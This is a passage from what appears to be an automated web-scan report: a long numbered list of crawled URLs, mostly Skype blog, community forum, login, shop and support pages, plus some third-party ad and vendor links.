18.130. http://blogs.skype.com/play/

18.131. http://blogs.skype.com/pt/

18.132. http://blogs.skype.com/ru/

18.133. http://blogs.skype.com/security/

18.134. http://blogs.skype.com/zh-Hans/

18.135. http://blogs.skype.com/zh-Hant/

18.136. http://community.skype.com/

18.137. http://community.skype.com/lithium/forum/images/divider-gray-300.jpg

18.138. http://community.skype.com/t5/Accesorios-y-hardware/bd-p/es_hardware

18.139. http://community.skype.com/t5/Allgemeine-Diskussion/bd-p/de_general

18.140. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

18.141. http://community.skype.com/t5/Ayuda-de-la-comunidad-para-todas/ct-p/es_platforms

18.142. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202

18.143. http://community.skype.com/t5/Call-quality/Cutoffs-after-latest-version-update-Compare-experiences/m-p/134042

18.144. http://community.skype.com/t5/Coffee-Corner/ADD-ME/m-p/134208

18.145. http://community.skype.com/t5/Coffee-Corner/Add-me/m-p/134218

18.146. http://community.skype.com/t5/Coffee-Corner/bd-p/Coffee_corner

18.147. http://community.skype.com/t5/Computer/ct-p/Computer

18.148. http://community.skype.com/t5/Deutsch/ct-p/de

18.149. http://community.skype.com/t5/DiscusiĂłn-general/bd-p/es_general

18.150. http://community.skype.com/t5/Discussione-generale/bd-p/it_general

18.151. http://community.skype.com/t5/English/ct-p/English

18.152. http://community.skype.com/t5/English/ct-p/English

18.153. http://community.skype.com/t5/Español/ct-p/es

18.154. http://community.skype.com/t5/Facebook/ct-p/fb_en

18.155. http://community.skype.com/t5/Formas-de-pagamento-crédito/bd-p/pt_payment

18.156. http://community.skype.com/t5/Frequently-Asked/ct-p/Frequently_asked

18.157. http://community.skype.com/t5/Garage/Add-an-quot-Old-Emoticons-quot-option-please/m-p/133868

18.158. http://community.skype.com/t5/Garage/bd-p/Garage

18.159. http://community.skype.com/t5/General/ct-p/General_discussion

18.160. http://community.skype.com/t5/Hardware/Speaker-problem/m-p/134244

18.161. http://community.skype.com/t5/Italiano/ct-p/it

18.162. http://community.skype.com/t5/Language-learning/Do-you-want-to-talk-with-me/m-p/134138

18.163. http://community.skype.com/t5/Language-learning/bd-p/Languages

18.164. http://community.skype.com/t5/Le-matériel-Skype/bd-p/fr_hardware

18.165. http://community.skype.com/t5/Les-produits-et-services-Skype/bd-p/fr_products

18.166. http://community.skype.com/t5/Linux/Google-Chrome-OS/m-p/133556

18.167. http://community.skype.com/t5/Linux/bd-p/Linux

18.168. http://community.skype.com/t5/Mac/Multiple-Skype-phone-numbers-how-can-I-forward-calls-to-ONLY-one/m-p/133784

18.169. http://community.skype.com/t5/Mac/OS-X-LION-Skype-5-2-BIIIIIG-PROBLEMS-Be-aware/m-p/134122

18.170. http://community.skype.com/t5/Mac/bd-p/Mac

18.171. http://community.skype.com/t5/Mobile/ct-p/Mobile

18.172. http://community.skype.com/t5/My-Account/ct-p/Account

18.173. http://community.skype.com/t5/Other-devices/GE-31591/m-p/133990

18.174. http://community.skype.com/t5/Other-devices/bd-p/Mobile_other

18.175. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment

18.176. http://community.skype.com/t5/Payments-and-Billing/Account-blocked/m-p/132180

18.177. http://community.skype.com/t5/Payments-and-Billing/bd-p/Payments_and_Billing

18.178. http://community.skype.com/t5/PortuguĂŞs/ct-p/pt

18.179. http://community.skype.com/t5/Public-API/Here-are-Workarounds-for-the-Skype4COM-Issues/m-p/133974

18.180. http://community.skype.com/t5/Public-API/bd-p/Public_API

18.181. http://community.skype.com/t5/Págos-Crédito-formas-de-pago/bd-p/es_payment

18.182. http://community.skype.com/t5/Security-Privacy-Trust-and/Account-blocked/m-p/133890

18.183. http://community.skype.com/t5/Security-Privacy-Trust-and/bd-p/Security_and_Privacy

18.184. http://community.skype.com/t5/Skype-5-3-Beta-for-Mac/How-to-change-langue/m-p/132756

18.185. http://community.skype.com/t5/Skype-5-3-Beta-for-Mac/bd-p/mac53

18.186. http://community.skype.com/t5/Skype-Community/bd-p/it_community

18.187. http://community.skype.com/t5/Skype-Connect/How-to-logout-from-facebook-account/m-p/133972

18.188. http://community.skype.com/t5/Skype-Connect/bd-p/Skype_Connect

18.189. http://community.skype.com/t5/Skype-Garage/ct-p/Skype_Garage

18.190. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager

18.191. http://community.skype.com/t5/Skype-Manager/deleting-an-older-account/m-p/133288

18.192. http://community.skype.com/t5/Skype-To-Go/Skype-to-Go-Numbers-always-busy/m-p/133620

18.193. http://community.skype.com/t5/Skype-To-Go/bd-p/Skype_To_Go

18.194. http://community.skype.com/t5/Skype-WiFi/Error-Message-quot-Cannot-connect-to-Skype-quot/m-p/132964

18.195. http://community.skype.com/t5/Skype-WiFi/bd-p/Skype_Access

18.196. http://community.skype.com/t5/Skype-auf-dem-Computer/ct-p/de_computer

18.197. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business

18.198. http://community.skype.com/t5/Skype-for-Business/ct-p/Business

18.199. http://community.skype.com/t5/Skype-fĂĽr-Smartphones/bd-p/de_mobile_smartphones

18.200. http://community.skype.com/t5/Skype-on-your-TV/Need-to-know/m-p/134140

18.201. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV

18.202. http://community.skype.com/t5/Skype-на-компŃ?Ń?Ń?еŃ?е/ct-p/ru_community

18.203. http://community.skype.com/t5/Skype-на-мобилŃ?Đ˝Ń?Ń?-Ń?Ń?Ń?Ń?ойŃ?Ń?ваŃ?/ct-p/ru_mobile

18.204. http://community.skype.com/t5/Subscriptions/Call-between-2-computers-on-the-same-account/m-p/129866

18.205. http://community.skype.com/t5/Subscriptions/Unlimited-world-subscription-not-working/m-p/134220

18.206. http://community.skype.com/t5/Subscriptions/bd-p/Subscriptions

18.207. http://community.skype.com/t5/Suporte-e-Ajuda-entre-a/ct-p/pt_platforms

18.208. http://community.skype.com/t5/Support-et-information/bd-p/fr_community

18.209. http://community.skype.com/t5/Supporto-Skype/bd-p/it_support

18.210. http://community.skype.com/t5/Symbian/bd-p/Symbian

18.211. http://community.skype.com/t5/Symbian/voice-call-nokia-c6/m-p/133740

18.212. http://community.skype.com/t5/Toolbars/My-skype-home-page-does-not-show-a-quot-search-for-users-option/m-p/132922

18.213. http://community.skype.com/t5/Toolbars/bd-p/Toolbars

18.214. http://community.skype.com/t5/TĂłpicos-Gerais/bd-p/pt_general

18.215. http://community.skype.com/t5/Welcome-Getting-Started/Welcome-to-the-Skype-Support-Network/m-p/24

18.216. http://community.skype.com/t5/Welcome-Getting-Started/bd-p/Welcome

18.217. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248

18.218. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242

18.219. http://community.skype.com/t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134210

18.220. http://community.skype.com/t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134222

18.221. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/46260

18.222. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/47126

18.223. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/61276

18.224. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492

18.225. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510

18.226. http://community.skype.com/t5/Windows/How-to-mute-all-notifications-in-Skype-without-DO-NOT-DISTURB/m-p/87914

18.227. http://community.skype.com/t5/Windows/Install-says-Another-Version-Installed/m-p/134202

18.228. http://community.skype.com/t5/Windows/Install-says-Another-Version-Installed/m-p/134246

18.229. http://community.skype.com/t5/Windows/Skype-5-5-High-idle-CPU-usage/m-p/130106

18.230. http://community.skype.com/t5/Windows/Skype-5-5-shows-as-Skype-5-3-0-120-in-quot-About-Skype-quot/m-p/132300

18.231. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644

18.232. http://community.skype.com/t5/Windows/Skype-fails-to-log-me-in/m-p/132356

18.233. http://community.skype.com/t5/Windows/Update-Skype/m-p/132324

18.234. http://community.skype.com/t5/Windows/Windows-Beta-5-5-Suggestion/td-p/26642

18.235. http://community.skype.com/t5/Windows/Windows-Crashes-on-Skype-Startup-Login/m-p/134250

18.236. http://community.skype.com/t5/Windows/bd-p/Windows

18.237. http://community.skype.com/t5/Windows/bd-p/Windows/page/75

18.238. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028

18.239. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true

18.240. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/message-uid/24028/highlight/true

18.241. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032

18.242. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/highlight/true

18.243. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/message-uid/24032/highlight/true

18.244. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246

18.245. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/highlight/true

18.246. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740

18.247. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/highlight/true

18.248. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/message-uid/26740/highlight/true

18.249. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/td-p/24028

18.250. http://community.skype.com/t5/Windows/skype-not-doadloading-via-help-and-check-for-update-and-Facebook/m-p/130368

18.251. http://community.skype.com/t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment

18.252. http://community.skype.com/t5/errors/error404page

18.253. http://community.skype.com/t5/forums/forumtopicpage.forummessageviewv2.quickreply.form.form.form

18.254. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24028

18.255. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24032

18.256. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/25246

18.257. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/26740

18.258. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1

18.259. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2922/print-single-message/true/page/1

18.260. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/3083/print-single-message/true/page/1

18.261. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/3272/print-single-message/true/page/1

18.262. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message

18.263. http://community.skype.com/t5/forums/searchpage.enableautocomplete:enableautocomplete

18.264. http://community.skype.com/t5/forums/searchpage.searchauthorfilter.form.form

18.265. http://community.skype.com/t5/forums/searchpage.searchcontent.messagesearchcontent.searchform.form.form

18.266. http://community.skype.com/t5/forums/searchpage/tab/message

18.267. http://community.skype.com/t5/forums/searchpage/tab/message

18.268. http://community.skype.com/t5/forums/searchpage/tab/user

18.269. http://community.skype.com/t5/forums/tagdetailpage/tag-cloud-grouping/tag/tag-cloud-style/frequent/message-scope/core-node/category-id/English/user-scope/all/tag-scope/all/timerange/all/tag-visibility-scope/public

18.270. http://community.skype.com/t5/forums/usersonlinepage

18.271. http://community.skype.com/t5/help/faqpage

18.272. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced

18.273. http://community.skype.com/t5/help/faqpage/faq-category-id/blogs

18.274. http://community.skype.com/t5/help/faqpage/faq-category-id/catex

18.275. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas

18.276. http://community.skype.com/t5/help/faqpage/faq-category-id/images

18.277. http://community.skype.com/t5/help/faqpage/faq-category-id/images2

18.278. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos

18.279. http://community.skype.com/t5/help/faqpage/faq-category-id/participation

18.280. http://community.skype.com/t5/help/faqpage/faq-category-id/personalization

18.281. http://community.skype.com/t5/help/faqpage/faq-category-id/pm

18.282. http://community.skype.com/t5/help/faqpage/faq-category-id/posting

18.283. http://community.skype.com/t5/help/faqpage/faq-category-id/qa

18.284. http://community.skype.com/t5/help/faqpage/faq-category-id/registration

18.285. http://community.skype.com/t5/help/faqpage/faq-category-id/search

18.286. http://community.skype.com/t5/help/faqpage/faq-category-id/solutions

18.287. http://community.skype.com/t5/help/faqpage/faq-category-id/tagging

18.288. http://community.skype.com/t5/help/faqpage/faq-category-id/video

18.289. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998

18.290. http://community.skype.com/t5/iPhone/bd-p/iPhone

18.291. http://community.skype.com/t5/tag/%20facebook/tg-p/category-id/English

18.292. http://community.skype.com/t5/tag/Android/tg-p/category-id/English

18.293. http://community.skype.com/t5/tag/Skype4COM/tg-p/category-id/English

18.294. http://community.skype.com/t5/tag/Sound/tg-p/category-id/English

18.295. http://community.skype.com/t5/tag/Video/tg-p/category-id/English

18.296. http://community.skype.com/t5/tag/audio/tg-p/category-id/English

18.297. http://community.skype.com/t5/tag/call/tg-p/category-id/English

18.298. http://community.skype.com/t5/tag/contacts/tg-p/category-id/English

18.299. http://community.skype.com/t5/tag/english/tg-p/category-id/English

18.300. http://community.skype.com/t5/tag/error/tg-p/category-id/English

18.301. http://community.skype.com/t5/tag/help/tg-p/category-id/English

18.302. http://community.skype.com/t5/tag/history/tg-p/category-id/English

18.303. http://community.skype.com/t5/tag/language/tg-p/category-id/English

18.304. http://community.skype.com/t5/tag/login/tg-p/category-id/English

18.305. http://community.skype.com/t5/tag/problem/tg-p/category-id/English

18.306. http://community.skype.com/t5/tag/refund/tg-p/category-id/English

18.307. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English

18.308. http://community.skype.com/t5/tag/subscriptions/tg-p/category-id/English

18.309. http://community.skype.com/t5/tag/update/tg-p/category-id/English

18.310. http://community.skype.com/t5/tag/voicemail/tg-p/category-id/English

18.311. http://community.skype.com/t5/user/viewprofilepage/user-id/1164

18.312. http://community.skype.com/t5/user/viewprofilepage/user-id/148

18.313. http://community.skype.com/t5/user/viewprofilepage/user-id/165910

18.314. http://community.skype.com/t5/user/viewprofilepage/user-id/165928

18.315. http://community.skype.com/t5/user/viewprofilepage/user-id/165934

18.316. http://community.skype.com/t5/user/viewprofilepage/user-id/165942

18.317. http://community.skype.com/t5/user/viewprofilepage/user-id/165962

18.318. http://community.skype.com/t5/user/viewprofilepage/user-id/165964

18.319. http://community.skype.com/t5/Đ?ккаŃ?Đ˝Ń?-и-плаŃ?ежи/ct-p/ru_account

18.320. http://community.skype.com/t5/Đ?ополниŃ?елŃ?Đ˝Ń?Đą-Ń?аздел/ct-p/ru_general_board

18.321. http://community.skype.com/t5/���/ct-p/jp

18.322. http://fls.doubleclick.net/activityi

18.323. https://fls.doubleclick.net/activityi

18.324. http://googleads.g.doubleclick.net/pagead/ads

18.325. http://googleads.g.doubleclick.net/pagead/ads

18.326. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

18.327. http://h17007.www1.hp.com/us/en/

18.328. http://h18004.www1.hp.com/products/blades/bladesystem/index.html

18.329. http://h20180.www2.hp.com/apps/Nav

18.330. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

18.331. http://h30187.www3.hp.com/

18.332. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

18.333. http://h30187.www3.hp.com/howto_QL_courses.jsp

18.334. http://h30187.www3.hp.com/index.jsp

18.335. http://h30261.www3.hp.com/phoenix.zhtml

18.336. http://h30434.www3.hp.com/

18.337. http://h30507.www3.hp.com/

18.338. https://h41183.www4.hp.com/inflexion/

18.339. http://heartbeat.skype.com/

18.340. http://heartbeat.skype.com/2011/08/paypal_payments_temporarily_un.html

18.341. https://login.skype.com/account/

18.342. https://login.skype.com/account/login-form

18.343. https://login.skype.com/account/password-automation

18.344. https://login.skype.com/account/password-reset-request

18.345. https://login.skype.com/account/password-token-sent

18.346. https://login.skype.com/account/signup-form

18.347. https://login.skype.com/go/shop

18.348. https://login.skype.com/go/shop.accessories.headsets

18.349. https://login.skype.com/go/shop.accessories.phones

18.350. https://login.skype.com/go/shop.accessories.webcams

18.351. https://login.skype.com/go/shop.extras

18.352. https://login.skype.com/go/skype.manager.setup

18.353. https://login.skype.com/go/tvwebcams

18.354. http://lwn.net/Articles/456878/

18.355. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right

18.356. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

18.357. http://s1.lqcdn.com/m.min.js

18.358. http://search.hp.com/query.html

18.359. http://shop.skype.com/

18.360. http://shop.skype.com/apps/

18.361. http://shop.skype.com/apps/Business/Clownfish-for-Skype.html

18.362. http://shop.skype.com/apps/Business/Zaplee-Phone-System-In-The-Cloud.html

18.363. http://shop.skype.com/apps/Business/index.html

18.364. http://shop.skype.com/apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html

18.365. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-Call-Recorder.html

18.366. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html

18.367. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html

18.368. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html

18.369. http://shop.skype.com/apps/Call-recording-audio-only/index.html

18.370. http://shop.skype.com/apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html

18.371. http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html

18.372. http://shop.skype.com/apps/Call-recording-audio-video/index.html

18.373. http://shop.skype.com/apps/Desktop-whiteboard-sharing/IDroo.html

18.374. http://shop.skype.com/apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html

18.375. http://shop.skype.com/apps/Desktop-whiteboard-sharing/index.html

18.376. http://shop.skype.com/apps/Faxing/PamFax-for-Mac-OS-X.html

18.377. http://shop.skype.com/apps/Faxing/PamFax-for-Windows.html

18.378. http://shop.skype.com/apps/Faxing/index.html

18.379. http://shop.skype.com/apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html

18.380. http://shop.skype.com/apps/Integrations-with-popular-software/index.html

18.381. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Android.html

18.382. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Apple.html

18.383. http://shop.skype.com/apps/Mobile-video-communications/index.html

18.384. http://shop.skype.com/apps/Search-Results.html

18.385. http://shop.skype.com/apps/index.html

18.386. http://shop.skype.com/go/shop

18.387. http://shop.skype.com/go/shop.accessories.headsets

18.388. http://shop.skype.com/go/shop.accessories.phones

18.389. http://shop.skype.com/go/shop.accessories.webcams

18.390. http://shop.skype.com/go/shop.extras

18.391. http://shop.skype.com/go/tvwebcams

18.392. http://shop.skype.com/intl/[LC]/

18.393. https://support.skype.com/de/

18.394. https://support.skype.com/en-us/

18.395. https://support.skype.com/en-us/category/ABOUT_SKYPE/

18.396. https://support.skype.com/en-us/category/AFFILIATE_PROGRAM/

18.397. https://support.skype.com/en-us/category/BANK_TRANSFERS/

18.398. https://support.skype.com/en-us/category/BIZ_VERSION/

18.399. https://support.skype.com/en-us/category/BLACKBERRY/

18.400. https://support.skype.com/en-us/category/BUYING_ACCESSORIES/

18.401. https://support.skype.com/en-us/category/CALLER_IDENTIFICATION/

18.402. https://support.skype.com/en-us/category/CALLING/

18.403. https://support.skype.com/en-us/category/CALLING_PHONES_SKYPEOUT/

18.404. https://support.skype.com/en-us/category/CALL_FORWARDING/

18.405. https://support.skype.com/en-us/category/CALL_QUALITY/

18.406. https://support.skype.com/en-us/category/CALL_TRANSFER/

18.407. https://support.skype.com/en-us/category/CONFERENCE_CALLING/

18.408. https://support.skype.com/en-us/category/CONNECTION_ISSUES/

18.409. https://support.skype.com/en-us/category/CONTACTS/

18.410. https://support.skype.com/en-us/category/CORDLESS_PHONES/

18.411. https://support.skype.com/en-us/category/CREDIT_CARDS/

18.412. https://support.skype.com/en-us/category/EXTRAS/

18.413. https://support.skype.com/en-us/category/FACEBOOK/

18.414. https://support.skype.com/en-us/category/FILE_TRANSFER/

18.415. https://support.skype.com/en-us/category/GIFT_CERTIFICATES/

18.416. https://support.skype.com/en-us/category/GIROPAY/

18.417. https://support.skype.com/en-us/category/GROUP_VIDEO_CALLING/

18.418. https://support.skype.com/en-us/category/INSTANT_MESSAGING_WITH_SKYPE/

18.419. https://support.skype.com/en-us/category/MONEYBOOKERS/

18.420. https://support.skype.com/en-us/category/MYSPACEIM_WITH_SKYPE/

18.421. https://support.skype.com/en-us/category/ONLINE_NUMBER_SKYPEIN/

18.422. https://support.skype.com/en-us/category/PAYMENT_PRICES/

18.423. https://support.skype.com/en-us/category/PAYPAL/

18.424. https://support.skype.com/en-us/category/PAYSAFECARD/

18.425. https://support.skype.com/en-us/category/PERSONALISE_SKYPE/

18.426. https://support.skype.com/en-us/category/PREPAID_CARDS/

18.427. https://support.skype.com/en-us/category/PRIVACY__SECURITY/

18.428. https://support.skype.com/en-us/category/PSP/

18.429. https://support.skype.com/en-us/category/PUBLIC_CHATS/

18.430. https://support.skype.com/en-us/category/SCREEN_SHARING/

18.431. https://support.skype.com/en-us/category/SC_CONFIG/

18.432. https://support.skype.com/en-us/category/SC_GETTING_STARTED/

18.433. https://support.skype.com/en-us/category/SC_PBX/

18.434. https://support.skype.com/en-us/category/SC_REQUIREMENTS/

18.435. https://support.skype.com/en-us/category/SC_TROUBLE/

18.436. https://support.skype.com/en-us/category/SEND_MONEY/

18.437. https://support.skype.com/en-us/category/SKYPEFIND/

18.438. https://support.skype.com/en-us/category/SKYPE_2_8_MAC_OR_BELOW/

18.439. https://support.skype.com/en-us/category/SKYPE_4_2_OR_BELOW/

18.440. https://support.skype.com/en-us/category/SKYPE_ACCESS/

18.441. https://support.skype.com/en-us/category/SKYPE_API/

18.442. https://support.skype.com/en-us/category/SKYPE_CALLS_FROM_BROWSERS/

18.443. https://support.skype.com/en-us/category/SKYPE_FOR_ANDROID/

18.444. https://support.skype.com/en-us/category/SKYPE_FOR_IPHONE/

18.445. https://support.skype.com/en-us/category/SKYPE_FOR_LINUX/

18.446. https://support.skype.com/en-us/category/SKYPE_FOR_MAC_OS_X/

18.447. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N800N810/

18.448. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N900/

18.449. https://support.skype.com/en-us/category/SKYPE_FOR_SYMBIAN/

18.450. https://support.skype.com/en-us/category/SKYPE_FOR_WEBOS/

18.451. https://support.skype.com/en-us/category/SKYPE_LITE/

18.452. https://support.skype.com/en-us/category/SKYPE_MANAGER_FOR_MEMBERS/

18.453. https://support.skype.com/en-us/category/SKYPE_ME/

18.454. https://support.skype.com/en-us/category/SKYPE_MOBILE_FOR_VERIZON/

18.455. https://support.skype.com/en-us/category/SKYPE_ON_AU/

18.456. https://support.skype.com/en-us/category/SKYPE_ON_TELUS/

18.457. https://support.skype.com/en-us/category/SKYPE_ON_THREE/

18.458. https://support.skype.com/en-us/category/SKYPE_ON_YOUR_TV/

18.459. https://support.skype.com/en-us/category/SKYPE_PRIME/

18.460. https://support.skype.com/en-us/category/SKYPE_PRO/

18.461. https://support.skype.com/en-us/category/SKYPE_SMS/

18.462. https://support.skype.com/en-us/category/SKYPE_TOOLBARS/

18.463. https://support.skype.com/en-us/category/SKYPE_TO_GO/

18.464. https://support.skype.com/en-us/category/SM_ACCOUNT_DETAILS/

18.465. https://support.skype.com/en-us/category/SM_FEATURES/

18.466. https://support.skype.com/en-us/category/SM_GETTING_STARTED/

18.467. https://support.skype.com/en-us/category/SM_MEMBERS/

18.468. https://support.skype.com/en-us/category/SM_PAYMENTS/

18.469. https://support.skype.com/en-us/category/SM_REPORTS/

18.470. https://support.skype.com/en-us/category/SUBSCRIPTIONS/

18.471. https://support.skype.com/en-us/category/TS_ACCOUNT/

18.472. https://support.skype.com/en-us/category/TS_INSTALL_UPGRADE/

18.473. https://support.skype.com/en-us/category/UKASH/

18.474. https://support.skype.com/en-us/category/VIDEO/

18.475. https://support.skype.com/en-us/category/VID_CALLING/

18.476. https://support.skype.com/en-us/category/VOICEMAIL/

18.477. https://support.skype.com/en-us/category/VOUCHERS/

18.478. https://support.skype.com/en-us/category/WINDOWS_MOBILE/

18.479. https://support.skype.com/en-us/category/YANDEX_MONEY/

18.480. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work

18.481. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working

18.482. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password

18.483. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

18.484. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings

18.485. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number

18.486. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products

18.487. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

18.488. https://support.skype.com/en-us/glossary

18.489. https://support.skype.com/en-us/search.form

18.490. https://support.skype.com/en-us/search_first/

18.491. https://support.skype.com/en/

18.492. https://support.skype.com/en/category/BANK_TRANSFERS/

18.493. https://support.skype.com/en/category/BIZ

18.494. https://support.skype.com/en/category/CALL

18.495. https://support.skype.com/en/category/CREDIT_CARDS/

18.496. https://support.skype.com/en/category/GIFT_CERTIFICATES/

18.497. https://support.skype.com/en/category/GIROPAY/

18.498. https://support.skype.com/en/category/MESSAGING

18.499. https://support.skype.com/en/category/MONEYBOOKERS/

18.500. https://support.skype.com/en/category/PAY

18.501. https://support.skype.com/en/category/PAYMENT_PRICES/

18.502. https://support.skype.com/en/category/PAYPAL/

18.503. https://support.skype.com/en/category/PAYSAFECARD/

18.504. https://support.skype.com/en/category/PREPAID_CARDS/

18.505. https://support.skype.com/en/category/PRIVACY__SECURITY/

18.506. https://support.skype.com/en/category/PROD

18.507. https://support.skype.com/en/category/SKYPE_FOR_YOUR_MOBILE

18.508. https://support.skype.com/en/category/SUBSCRIPTIONS/

18.509. https://support.skype.com/en/category/TECH

18.510. https://support.skype.com/en/category/TS_ACCOUNT/

18.511. https://support.skype.com/en/category/UKASH/

18.512. https://support.skype.com/en/category/VID_CALL

18.513. https://support.skype.com/en/category/VOUCHERS/

18.514. https://support.skype.com/en/category/YANDEX_MONEY/

18.515. https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account

18.516. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home

18.517. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password

18.518. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

18.519. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

18.520. https://support.skype.com/en/faqFeedback.form

18.521. https://support.skype.com/en/glossary

18.522. https://support.skype.com/en/search

18.523. https://support.skype.com/en/search.form

18.524. https://support.skype.com/en/support_selection_after_search

18.525. https://support.skype.com/en/tips

18.526. https://support.skype.com/faqView.do

18.527. https://support.skype.com/homepage.do

18.528. https://support.skype.com/search.do

18.529. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

18.530. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

18.531. http://www.cymphonix.com/2011-shaping-demo-sem.html

18.532. http://www.facebook.com/plugins/fan.php

18.533. http://www.imperva.com/index.html

18.534. http://www.imperva.com/products/wsc_web-application-firewall.html

18.535. http://www.radware.com/

18.536. http://www.radware.com/Resources/AppWallSolution.aspx

18.537. http://www.radware.com/gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw

18.538. http://www.skype.com/favicon.ico

18.539. http://www.skype.com/intl/[LC]/

18.540. http://www.skype.com/intl/_application/content/error_pages/404/

18.541. http://www.skype.com/intl/en-gb/campaigns/toolbar/

18.542. http://www.skype.com/intl/en-gb/legal/privacy/general/

18.543. http://www.skype.com/intl/en-us/business

18.544. http://www.skype.com/intl/en-us/business-user-guide/pc/

18.545. http://www.skype.com/intl/en-us/business/

18.546. http://www.skype.com/intl/en-us/business/download

18.547. http://www.skype.com/intl/en-us/business/download/

18.548. http://www.skype.com/intl/en-us/business/group-video

18.549. http://www.skype.com/intl/en-us/business/group-video/

18.550. http://www.skype.com/intl/en-us/business/skype-connect

18.551. http://www.skype.com/intl/en-us/business/skype-connect/

18.552. http://www.skype.com/intl/en-us/business/skype-manager

18.553. http://www.skype.com/intl/en-us/business/skype-manager/

18.554. http://www.skype.com/intl/en-us/campaigns/gvc/11q1_combined.html

